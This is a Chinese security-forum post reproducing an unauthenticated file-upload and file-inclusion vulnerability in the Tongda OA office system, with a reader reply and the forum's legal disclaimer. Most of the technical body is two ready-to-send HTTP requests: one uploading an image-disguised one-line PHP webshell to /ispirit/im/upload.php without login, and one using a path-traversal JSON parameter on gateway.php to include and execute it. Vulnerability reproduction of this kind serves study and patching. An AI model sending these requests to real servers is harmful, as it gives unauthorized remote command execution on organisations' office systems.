搜索
查看: 1978|回复: 1

通达OA文件上传&文件包含漏洞解析

  [复制链接]

598

主题

876

帖子

2235

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2235

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2020-5-11 11:00:38 | 显示全部楼层 |阅读模式

通达OA是由北京通达信科科技有限公司开发的一款办公系统,近日通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到测试。 测试者可在未授权的情况下可上传图片Shell文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且测试者无须登陆认证即可完成测试。 文件上传与包含

搭建本地环境

通达OA获取: 链接:https://pan.baidu.com/s/1QFAoLxj9pD1bnnq3f4I8lg 提取码:ousi 包含漏洞的两个文件: 文件上传:webroot\ispirit\im\upload.php 文件包含:webroot\ispirit\interface\gateway.php

漏洞复现

在没有登录的情况下上传文件 我们直接访问 http://localhost//ispirit/im/upload.php 提示:-ERR 用户未登陆 ok,我们在burp中构造数据包

POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.174.159:80
Content-Length: 602
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryBwVAwV3O4sifyhr3
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundaryBwVAwV3O4sifyhr3
Content-Disposition: form-data; name="P"


------WebKitFormBoundaryBwVAwV3O4sifyhr3
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundaryBwVAwV3O4sifyhr3
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg


------WebKitFormBoundaryBwVAwV3O4sifyhr3--

这里我构造了一个名为bbskali.php的图片一句话Shell。但是上传之后格式为jpg格式。 成功上传图片Shell 如上图,我们成功上传图片。位置为2005/339702047.jpg 通达OA默认上传位置:myoa/attach/im则上面的完整路劲为:myoa/attach/im/2005/339702047.jpg

通过文件包含解析出一句话

POST /ispirit/interface/gateway.php HTTP/1.1

Host: 192.168.123.209

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 59

json={"url":"/general/../../attach/im/2005/339702047.jpg"}

解析为php一句话

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

2

主题

9

帖子

15

积分

新手开车

Rank: 1

积分
15
发表于 2020-5-12 17:43:42 来自手机 | 显示全部楼层
以前公司用的就是这个系统!
回复 支持 2 反对 0

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
朕知道了
快速回复 返回顶部 返回列表